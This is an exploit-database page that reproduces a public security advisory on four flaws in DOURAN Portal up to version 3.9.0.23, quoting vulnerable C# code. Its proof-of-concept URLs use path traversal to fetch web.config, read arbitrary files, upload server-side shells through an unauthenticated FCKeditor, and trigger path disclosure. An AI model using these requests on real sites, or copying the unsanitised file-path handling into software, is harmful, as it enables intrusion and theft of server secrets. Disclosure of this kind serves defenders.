0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DOURAN Portal <= 3.9.0.23 Multiple Remote Vulnerabilities
========================================================= DOURAN Portal <= 3.9.0.23 Multiple Remote Vulnerabilities ========================================================= Abysssec Inc Public Advisory Description : these vulnerabilites found one year ago and new version of this portal "is not" affect whith these vulnerabilites anymore but still lots of web site uses of old version and are vulnerable and also new version is not "fully secure" . so because of patching there is no point to keep these private anymore these vulnerabities are just for educational purpose and author will be not be responsible for any damage using this vulnerabiltes . Discovery : www.Abysssec.com Title : Douran Portal Multiple Remote Vulnerabilities Affected Version : DOURAN Portal <= V3.9.0.23 Vendor Site : www.douran.com Vulnerabilites : 1- File Download Vulnerbility in /Admin/ImportExport/download.aspx Vulnerable Code : string strFileName = Request.Params["Filename"]; if((strFileName != null) && (strFileName != "")) { string strPath = Server.MapPath("../../_DouranPortal/ExportPortal"); strPath += "\\" + strFileName; // Vulnerablity if(System.IO.File.Exists(strPath)) { Response.Clear(); Response.ContentType = "application/octet-stream"; Response.AddHeader("Content-Transfer-Encoding", "binary"); Response.AddHeader("Content-Disposition", "attachment; filename=\"" + strFileName + "\""); Response.Flush(); Response.WriteFile(strPath); Response.End(); ..... PoC : http://www.vulnerable.com/Admin/ImportExport/Download.aspx?filename=../../web.config 2- File Download Vulnerbility in /download.aspx Vulnerable Code : string fileNameAttach = Request.Params["FileNameAttach"]; string filePathAttach = Request.Params["FilePathAttach"]; string originalAttachFileName = Request.Params["OriginalAttachFileName"]; if((fileNameAttach != null) && (filePathAttach != "")) { string strPath = Server.MapPath(filePathAttach + "/" + fileNameAttach); // Vulnerable if(System.IO.File.Exists(strPath)) { System.IO.Stream iStream = null; // Buffer to read 1 mega bytes in chunk: int segmentLegthToRead = 1024 * 1024; byte[] buffer = new Byte[segmentLegthToRead]; ...... PoC : http://www.vulnerable.com/download.aspx?FileNameAttach=/web.config 3- File Upload Vulnerability DesktopModules/fck/editor Vulnerablity : Using Fckeditor without any authentication will give ability to attacker to upload his / her own file and fckeditor won't check file extention it will give ability to attacker upload a malicius server side ASP / ASPX / PHP / JSP . so this vulnerability can creation access to server / portal completely . PoC : http://www.vulnerable.com/DesktopModules/fck/editor/filemanager/upload/test.html 4-Path Disclosure Vulnerablity In DesktopModules/DesktopCalendar/HZAN_pickercal.aspx Vulnerable Code : Calendar1.FullWidth = true; Calendar1.BigCaledar = bool.Parse((string)Request.QueryString["calsize"]); if (!IsPostBack) { Calendar1.Date = new DateTime(long.Parse((string)Request.QueryString["curd"])); Calendar1.CalendarCulture = (HZAN.Calendar.CultureType)Enum.Parse(typeof(HZAN.Calendar.CultureType),(string)Request.QueryString["culture"]); seldate = Calendar1.Date.ToShortDateString(); ChangeSelDate1(); } PoC : http://www.vulnerable.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize=' Final Note : for advanced security topics / sharing idea and etc ... please feel free to contact me at : admin [at] abysssec.com # 0day.today [2024-07-08] #